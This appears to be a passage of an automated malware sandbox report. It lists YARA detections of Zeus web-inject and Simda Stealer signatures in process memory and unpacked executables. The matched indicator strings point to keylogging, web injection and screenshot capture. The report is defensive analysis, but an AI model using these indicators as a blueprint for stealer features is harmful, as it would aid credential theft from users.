00000002.00000003.2448622131.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2508393493.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2501374465.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2497016320.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000026.00000002.2502168671.0000000002900000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
0000001D.00000002.2478719931.0000000002920000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000002.00000003.2501604041.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2455382191.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0000001F.00000002.2486764914.00000000025D0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000002.00000003.2469676261.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000002.3272240736.0000000002915000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49810:$a1: name=%s&port=%u 0x48fa8:$a2: data_inject 0x49198:$a3: keylog.txt 0x48e3d:$a4: User-agent: %s]]] 0x49964:$a5: %s\%02d.bmp
00000002.00000003.2510323696.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000013.00000002.2455739148.00000000014B0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4fc10:$a1: name=%s&port=%u 0x4f3a8:$a2: data_inject 0x4f598:$a3: keylog.txt 0x4f23d:$a4: User-agent: %s]]] 0x4fd64:$a5: %s\%02d.bmp
00000002.00000003.2508541619.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.3060629328.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000024.00000002.2570365409.0000000002C90000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000002.00000003.2501156976.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000019.00000002.2473316243.0000000002650000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000017.00000002.2469451874.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
00000002.00000003.2478689860.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2450971544.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2510195177.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000002.3273788686.0000000002D63000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49810:$a1: name=%s&port=%u 0x48fa8:$a2: data_inject 0x49198:$a3: keylog.txt 0x48e3d:$a4: User-agent: %s]]] 0x49964:$a5: %s\%02d.bmp
00000002.00000003.2508233599.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2498994285.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.3060188818.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000002.00000003.2474596414.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0000001B.00000002.2477343804.0000000002DA0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000002.00000002.3272240736.00000000028C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
0000000F.00000002.2451052390.0000000000960000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000002.00000003.2039049974.000000000088E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000002.00000003.2039049974.000000000088E000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
00000024.00000002.2535425288.00000000028C0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
Process Memory Space: roundwood.exe PID: 5852	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
Process Memory Space: roundwood.exe PID: 5852	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xc128:$a1: name=%s&port=%u 0x668b6:$a1: name=%s&port=%u 0xb07c:$a2: data_inject 0x6580a:$a2: data_inject 0xb636:$a3: keylog.txt 0x65dc4:$a3: keylog.txt 0xaf4b:$a4: User-agent: %s]]] 0x656d9:$a4: User-agent: %s]]] 0xc22c:$a5: %s\%02d.bmp 0x669ba:$a5: %s\%02d.bmp
Process Memory Space: svchost.exe PID: 5284	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
Process Memory Space: svchost.exe PID: 5284	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x6afa:$a1: name=%s&port=%u 0x57a57:$a1: name=%s&port=%u 0x8d46f:$a1: name=%s&port=%u 0xc45cc:$a1: name=%s&port=%u 0xe7654:$a1: name=%s&port=%u 0x1082a4:$a1: name=%s&port=%u 0x116df4:$a1: name=%s&port=%u 0x5a43:$a2: data_inject 0x569ab:$a2: data_inject 0x8c3b8:$a2: data_inject 0xc3515:$a2: data_inject 0xe65a8:$a2: data_inject 0x1071ed:$a2: data_inject 0x115d3d:$a2: data_inject 0x5ffd:$a3: keylog.txt 0x56f65:$a3: keylog.txt 0x8c972:$a3: keylog.txt 0xc3acf:$a3: keylog.txt 0xe6b62:$a3: keylog.txt 0x1077a7:$a3: keylog.txt 0x1162f7:$a3: keylog.txt
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4268	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x8e76:$a1: name=%s&port=%u 0x2e4ab:$a1: name=%s&port=%u 0x7dbf:$a2: data_inject 0x2d3f4:$a2: data_inject 0x8379:$a3: keylog.txt 0x2d9ae:$a3: keylog.txt 0x7c8e:$a4: User-agent: %s]]] 0x2d2c3:$a4: User-agent: %s]]] 0x8f7a:$a5: %s\%02d.bmp 0x2e5af:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4672	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x639c:$a1: name=%s&port=%u 0x1a55a:$a1: name=%s&port=%u 0x52e5:$a2: data_inject 0x194a3:$a2: data_inject 0x589f:$a3: keylog.txt 0x19a5d:$a3: keylog.txt 0x51b4:$a4: User-agent: %s]]] 0x19372:$a4: User-agent: %s]]] 0x64a0:$a5: %s\%02d.bmp 0x1a65e:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 6980	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x403a:$a1: name=%s&port=%u 0x1b249:$a1: name=%s&port=%u 0x2f83:$a2: data_inject 0x1a192:$a2: data_inject 0x353d:$a3: keylog.txt 0x1a74c:$a3: keylog.txt 0x2e52:$a4: User-agent: %s]]] 0x1a061:$a4: User-agent: %s]]] 0x413e:$a5: %s\%02d.bmp 0x1b34d:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 6300	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x5802:$a1: name=%s&port=%u 0x1c569:$a1: name=%s&port=%u 0x474b:$a2: data_inject 0x1b4b2:$a2: data_inject 0x4d05:$a3: keylog.txt 0x1ba6c:$a3: keylog.txt 0x461a:$a4: User-agent: %s]]] 0x1b381:$a4: User-agent: %s]]] 0x5906:$a5: %s\%02d.bmp 0x1c66d:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 6648	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xf5df:$a1: name=%s&port=%u 0x26531:$a1: name=%s&port=%u 0xe528:$a2: data_inject 0x2547a:$a2: data_inject 0xeae2:$a3: keylog.txt 0x25a34:$a3: keylog.txt 0xe3f7:$a4: User-agent: %s]]] 0x25349:$a4: User-agent: %s]]] 0xf6e3:$a5: %s\%02d.bmp 0x26635:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 5168	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xfbe2:$a1: name=%s&port=%u 0x20a3f:$a1: name=%s&port=%u 0xeb2b:$a2: data_inject 0x1f988:$a2: data_inject 0xf0e5:$a3: keylog.txt 0x1ff42:$a3: keylog.txt 0xe9fa:$a4: User-agent: %s]]] 0x1f857:$a4: User-agent: %s]]] 0xfce6:$a5: %s\%02d.bmp 0x20b43:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 5616	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xa664:$a1: name=%s&port=%u 0x1cdac:$a1: name=%s&port=%u 0x95ad:$a2: data_inject 0x1bcf5:$a2: data_inject 0x9b67:$a3: keylog.txt 0x1c2af:$a3: keylog.txt 0x947c:$a4: User-agent: %s]]] 0x1bbc4:$a4: User-agent: %s]]] 0xa768:$a5: %s\%02d.bmp 0x1ceb0:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 2672	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x369f:$a1: name=%s&port=%u 0x26126:$a1: name=%s&port=%u 0x25e8:$a2: data_inject 0x2506f:$a2: data_inject 0x2ba2:$a3: keylog.txt 0x25629:$a3: keylog.txt 0x24b7:$a4: User-agent: %s]]] 0x24f3e:$a4: User-agent: %s]]] 0x37a3:$a5: %s\%02d.bmp 0x2622a:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 3436	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x9e89:$a1: name=%s&port=%u 0x25ae6:$a1: name=%s&port=%u 0x8dd2:$a2: data_inject 0x24a2f:$a2: data_inject 0x938c:$a3: keylog.txt 0x24fe9:$a3: keylog.txt 0x8ca1:$a4: User-agent: %s]]] 0x248fe:$a4: User-agent: %s]]] 0x9f8d:$a5: %s\%02d.bmp 0x25bea:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4764	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xcad3:$a1: name=%s&port=%u 0x25b10:$a1: name=%s&port=%u 0xba1c:$a2: data_inject 0x24a59:$a2: data_inject 0xbfd6:$a3: keylog.txt 0x25013:$a3: keylog.txt 0xb8eb:$a4: User-agent: %s]]] 0x24928:$a4: User-agent: %s]]] 0xcbd7:$a5: %s\%02d.bmp 0x25c14:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 3656	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x9245:$a1: name=%s&port=%u 0x20944:$a1: name=%s&port=%u 0x818e:$a2: data_inject 0x1f88d:$a2: data_inject 0x8748:$a3: keylog.txt 0x1fe47:$a3: keylog.txt 0x805d:$a4: User-agent: %s]]] 0x1f75c:$a4: User-agent: %s]]] 0x9349:$a5: %s\%02d.bmp 0x20a48:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4460	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xca49:$a1: name=%s&port=%u 0x1b7fd:$a1: name=%s&port=%u 0xb992:$a2: data_inject 0x1a746:$a2: data_inject 0xbf4c:$a3: keylog.txt 0x1ad00:$a3: keylog.txt 0xb861:$a4: User-agent: %s]]] 0x1a615:$a4: User-agent: %s]]] 0xcb4d:$a5: %s\%02d.bmp 0x1b901:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 2212	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xcc97:$a1: name=%s&port=%u 0x13d9a:$a1: name=%s&port=%u 0xbbe0:$a2: data_inject 0x12ce3:$a2: data_inject 0xc19a:$a3: keylog.txt 0x1329d:$a3: keylog.txt 0xbaaf:$a4: User-agent: %s]]] 0x12bb2:$a4: User-agent: %s]]] 0xcd9b:$a5: %s\%02d.bmp 0x13e9e:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 2180	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x1d946:$a1: name=%s&port=%u 0x26048:$a1: name=%s&port=%u 0x1c88f:$a2: data_inject 0x24f91:$a2: data_inject 0x1ce49:$a3: keylog.txt 0x2554b:$a3: keylog.txt 0x1c75e:$a4: User-agent: %s]]] 0x24e60:$a4: User-agent: %s]]] 0x1da4a:$a5: %s\%02d.bmp 0x2614c:$a5: %s\%02d.bmp
Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4444	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x1972d:$a1: name=%s&port=%u 0x23975:$a1: name=%s&port=%u 0x18676:$a2: data_inject 0x228be:$a2: data_inject 0x18c30:$a3: keylog.txt 0x22e78:$a3: keylog.txt 0x18545:$a4: User-agent: %s]]] 0x2278d:$a4: User-agent: %s]]] 0x19831:$a5: %s\%02d.bmp 0x23a79:$a5: %s\%02d.bmp
Click to see the 94 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1452000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.38.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.18.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2900000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
2.2.svchost.exe.2915c00.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.2.svchost.exe.2d63c00.6.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.22.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.39.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.10.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.c52000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
0.2.roundwood.exe.400000.0.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
0.2.roundwood.exe.400000.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4fc10:$a1: name=%s&port=%u 0x4f3a8:$a2: data_inject 0x4f598:$a3: keylog.txt 0x4f23d:$a4: User-agent: %s]]] 0x4fd64:$a5: %s\%02d.bmp
19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
